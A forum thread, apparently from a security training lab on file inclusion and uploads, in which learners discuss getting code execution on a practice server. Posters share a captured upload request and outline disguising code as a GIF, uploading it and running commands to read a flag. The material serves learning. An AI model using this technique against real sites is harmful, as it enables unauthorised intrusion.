[File Inclusion][LFI and File Uploads]

hey guys.can some one help me for this question?
Use any of the techniques covered in this section to gain RCE and read the flag at /
i go to this http://159.65.81.40:30186/settings.php url and it just give me file not allowed error when i click on upload.i saw requests with burp and this is the post request after click on upload bottom.can somebody help me please?

POST /upload.php HTTP/1.1

Host: 159.65.81.40:30186

Content-Length: 150

Accept: */*

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXGg68SiXvWXYKlUF

Origin: http://159.65.81.40:30186

Referer: http://159.65.81.40:30186/settings.php

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Connection: close



------WebKitFormBoundaryXGg68SiXvWXYKlUF

Content-Disposition: form-data; name="uploadFile"



undefined

------WebKitFormBoundaryXGg68SiXvWXYKlUF--

You have to create the code and save it as a gif, upload the file, and then execute it. In the end, where it says =id, you can keep changing to search for the file path.

Hi, I’m also having trouble with this, I did just as the section said and created a code and saved it as a gif, when I uploaded it, it worked and it did show id. When I list the / directory I also found a txt file, which contains the string “GIF8” in it, unfortunately, it is not the answer to the question. I’m really stuck and don’t know what to do

The file has the magic bytes prefixing it. drop the GIF8 and cat the file

Thank you so much, the magic bytes prefixing part is where it stumped me, and I’m not that good with curl, thankyou so much for the help.